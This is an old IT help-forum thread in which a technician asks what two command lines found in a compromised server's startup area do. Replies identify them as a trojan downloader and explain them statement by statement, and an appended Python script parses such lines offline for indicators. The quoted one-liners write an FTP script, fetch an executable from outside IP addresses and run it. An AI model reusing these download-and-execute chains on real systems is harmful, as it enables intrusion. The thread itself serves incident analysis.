What do these commands do

dparrott (MIS), Jul 26, 2004
A customer of mine had the following two commands in the run area of their server. They run on a 192.168 subnet, so these go to the outside.

cmd.exe /c del i&echo open 66.244.112.148 15635 > i&echo user 1 1 >> i &echo get 140.exe >> i &echo quit >> i &ftp -n -s:i &140.exe&del i&exit


cmd.exe /c del i&echo open 66.244.112.248 13544 > i&echo user 1 1 >> i &echo get 446.exe >> i &echo quit >> i &ftp -n -s:i &446.exe&del i&exit

The server was beeping at them, and VNC (which has been uninstalled, and Remote Desktop has been disabled, along with remote assistance) was accepting a connection from 66.244.X.X. The computer was always locked the times that I heard it, so VNC would not have allowed them to run anything. I have also started a virus scan and will do both Hijack this and ad-aware scans when I am there next, as I believe they have been compromised. I will also strongly advise them to change all of their passwords. I also have not searched for 446.exe either, yet.

This is beyond my understanding of CLI environments.
Thanks for your help in advance.

Danny
 
Definitely looks like something nasty has got on the machine.

All you can do is, as you say, virus scan (I would use an online scanner rather than the AV on the machine, as it may have been compromised), scan for spyware and malware, and change all passwords.

Is this server behind a hardware firewall? If it is, disable any port forwarding to the server.

All you need in this life is ignorance and confidence; then success is sure.
- Mark Twain
 
Thanks for reinforcing that something is there. Any ideas about the original question of what the CLI commands do?
 
It looks like a trojan that creates and runs an ftp script to download 446.exe from those IP addresses.

All you need in this life is ignorance and confidence; then success is sure.
- Mark Twain
 
FYI

If you wanted you could use to find out where those IP addresses are in the world.

All you need in this life is ignorance and confidence; then success is sure.
- Mark Twain
 
Pagy,

Thanks for answering the original question. I was hoping for something like "/c causes cmd.exe to open silently, del deletes i&echo ..." As I said, the cli stuff is more advanced than I am and the i&'s are really throwing off my interpretation of it.
 
The /c just means run this in a command shell and then terminate

All you need in this life is ignorance and confidence; then success is sure.
- Mark Twain
 
I already had found out where the IP address is from. It comes from an ISP in Ellotsville Indiana.

What does "del i&echo open 66.244.112.148 15635 " do?
I recognize the IP address, and then the port, but the "del i&echo open" part is throwing me off.

The ">" redirects the output.

What does "i&echo user 1 1" do?

the ">>" redirects the output, appending it this time.

What does "i&echo get 140.exe" do?

the ">>" redirects the output, appending it this time.

What does "i&echo quit" do?

the ">>" redirects the output, appending it this time.

What does "i&ftp -n -s:i &140.exe&del i&exit" do?

I understandably don't want to run these commands to find out what they do because of the security implications. I am not looking for advice on how to fix the problem. I am looking for an explanation along the lines of pagy's last post, but for the entire series of commands.

Thanks in advance
 
I found the following:

The site 81.64.226.142 uses TCP port 28162
The account is 1 and the password is 1
The script tries to FTP Get 364.exe and then execute 364.exe
It is much like using the FTP URL...
f*p://1:1@81.64.226.142:28162/364.exe


The site 81.64.46.76 uses TCP port 27055
The account is 1 and the password is 1
The script tries to FTP Get 818.ex and then execute 818.ex
It is much like using the FTP URL...
f*p://1:1@81.64.46.76:27055/818.exe

*NOTE: FTP URLs obfuscated

See this link for the whole thread

All you need in this life is ignorance and confidence; then success is sure.
- Mark Twain
 
Thanks guys. I know what was happening. What are all the "i&" ? I am not looking for a high level explanation of the whole thing, but a lower level statement by statement explanation.
 
OK, here goes. The ampersand is a statement separator; this lets the commands be all on one line and run one after the other. Spaces are optional in some contexts, so for instance the i is actually separate from the ampersand.
cmd.exe /c del i&echo open 66.244.112.148 15635 > i&echo user 1 1 >> i &echo get 140.exe >> i &echo quit >> i &ftp -n -s:i &140.exe&del i&exit
Code:
del i - delete a file named i
echo open 66.244.112.148 15635 > i - echo the statement to a file called i
echo user 1 1 >> i - same thing
echo get 140.exe >> i - same thing
echo quit >> i - same thing
ftp -n -s:i - start FTP, use commands in the script named i
140.exe - execute the program downloaded by the FTP script
del i - del the file named i
Does that help?
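To go with the statement-by-statement breakdown above, here is an added triage script (my own, not code from the thread or from any poster) that takes a one-liner of this shape, replays the echo redirects to reconstruct the FTP script file without executing anything, and pulls out the server, port, credentials and fetched file names that one would block or search for. The sample command is constructed in the form of the ones quoted in the thread, and the function names are my own.

```python
import re

# Constructed sample in the shape of the one-liner quoted in the thread (not taken live from it).
SAMPLE = ("cmd.exe /c del i&echo open 66.244.112.148 15635 > i&echo user 1 1 >> i "
          "&echo get 140.exe >> i &echo quit >> i &ftp -n -s:i &140.exe&del i&exit")

def split_commands(cmdline):
    """Drop the 'cmd.exe /c' prefix and split on '&', cmd's run-in-sequence separator."""
    # Quoted '&' and '^' escapes are not handled; the one-liners in the thread use neither.
    body = re.sub(r'^\s*cmd(?:\.exe)?\s+/c\s+', '', cmdline, flags=re.I)
    return [c.strip() for c in body.split('&') if c.strip()]

def reconstruct_scripts(commands):
    """Replay 'echo TEXT > FILE' (create) and 'echo TEXT >> FILE' (append) without running anything."""
    # 'del' is ignored on purpose: the chain deletes the script after use, we want what was written.
    files = {}
    for cmd in commands:
        m = re.match(r'echo\s+(.*?)\s*(>>|>)\s*(\S+)$', cmd, re.I)
        if m:
            text, op, name = m.groups()
            files[name] = (files.get(name, '') if op == '>>' else '') + text + '\n'
    return files

def summarize_ftp_script(script):
    """Pull host, port, credentials and fetched files out of an 'ftp -s:FILE' script."""
    info = {'host': None, 'port': 21, 'user': None, 'password': None, 'files': []}
    for line in script.splitlines():
        parts = line.split() + [None, None]          # pad so optional fields index safely
        verb = (parts[0] or '').lower()
        if verb == 'open':
            info['host'], info['port'] = parts[1], int(parts[2] or 21)
        elif verb == 'user':
            info['user'], info['password'] = parts[1], parts[2]
        elif verb == 'get' and parts[1]:
            info['files'].append(parts[1])
    return info

def triage(cmdline):
    """One summary per 'ftp -s:' call: IoCs, equivalent ftp:// URLs, and downloaded files the chain runs."""
    cmds = split_commands(cmdline)
    scripts = reconstruct_scripts(cmds)
    results = []
    for cmd in cmds:
        m = re.match(r'ftp\b.*-s:(\S+)', cmd, re.I)
        if m and m.group(1) in scripts:
            s = summarize_ftp_script(scripts[m.group(1)])
            s['urls'] = ['ftp://{user}:{password}@{host}:{port}/{f}'.format(f=f, **s) for f in s['files']]
            s['executed'] = [c for c in cmds if c in s['files']]   # fetched and then run directly
            results.append(s)
    return results
```

The 'urls' field shows the same equivalence the thread points out (the script behaves like fetching ftp://1:1@host:port/file), which is convenient for firewall logs and proxy searches.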
 
That was exactly what I was looking for. Thank you very much. I gave you a star for this.

Danny
 